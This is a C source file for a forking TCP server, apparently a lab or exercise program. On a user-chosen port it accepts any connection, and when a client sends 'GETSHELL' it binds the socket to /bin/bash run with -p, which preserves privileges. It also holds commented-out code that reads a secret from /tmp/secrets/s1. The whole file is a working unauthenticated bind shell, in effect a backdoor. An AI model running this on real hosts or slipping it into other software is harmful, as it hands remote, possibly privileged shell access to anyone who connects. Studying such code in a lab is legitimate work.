#define _GNU_SOURCE
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define CMDLEN 100

int create_endpoint(unsigned short port) {
    int sd;
    struct sockaddr_in addr;

    sd = socket(AF_INET, SOCK_STREAM, 0);
    if (sd == -1) {
        perror("cannot create socket");
        exit(1);
    }

    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = INADDR_ANY;
    addr.sin_port = htons(port);

    if (bind(sd, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
        perror("cannot bind");
        exit(1);
    }

    listen(sd, 8);

    return sd;
}

void get_shell(int fd) {
    dup2(fd, 0);
    dup2(fd, 1);
    dup2(fd, 2);
    execle("/bin/bash", "/bin/bash", "-p", NULL, NULL);
}

void handle_client(int fd) {
    char buff[CMDLEN];
    FILE *tx, *rx;

    tx = fdopen(fd, "w+");
    if (tx == NULL) {
        perror("fdopen failed (tx)");
        exit(1);    
    }
    rx = fdopen(dup(fd), "r+");
    if (rx == NULL) {
        perror("fdopen failed (rx)");
        exit(1);
    }
    setlinebuf(tx);
    setlinebuf(rx);

    printf("handling\n");

    for(;;) {
        fprintf(tx, "Command: ");
        fflush(tx);
        if (fgets(buff, sizeof(buff), rx) != NULL) {
            printf("command received: %s", buff);
            if (strncmp(buff, "GETSHELL", 7) == 0) {
                get_shell(fd);
            /*
            } else if (strncmp(buff, "CHECKSECRET", 11) == 0) {
                int s;
                FILE *secret = fopen("/tmp/secrets/s1", "r");
                if (secret == NULL) {
                    perror("fopen failed");
                    exit(1);    
                }
                fscanf(secret, "%d", &s);
                if (s == 42) {
                    fprintf(tx, "OK!\n");                
                }
            */
            } else {
                fprintf(tx, "Invalid command. Try again.\n");
            }
        }
    }
}

int main(int argc, char* argv[]) {
    int sd, cd, pid;
    socklen_t len;
    struct sockaddr_in client;

    if (argc < 2) {
        printf("Usage: %s <port>\n", argv[0]);
        return 1;
    }

    /* read secret file */
    /*
    int s;
    FILE *secret = fopen("/tmp/secrets/s1", "r");
    if (secret == NULL) {
        perror("fopen failed");
        exit(1);    
    }
    fscanf(secret, "%d", &s);
    printf("secret: %d\n", s);
    */

    sd = create_endpoint(strtol(argv[1], NULL, 10));
    
    len = sizeof(client);
    for(;;) {
        cd = accept(sd, (struct sockaddr *)(&client), &len);
        if (cd == -1) {
            perror("accept failed");
            return 1;
        }

        if ((pid = fork()) == 0) {
            /* child */
            handle_client(cd);
            close(cd);
        } else if (pid > 0) {
            /* parent */
            printf("client connected\n");
        } else {
            perror("fork failed");
            return 1;
        }
    }
}
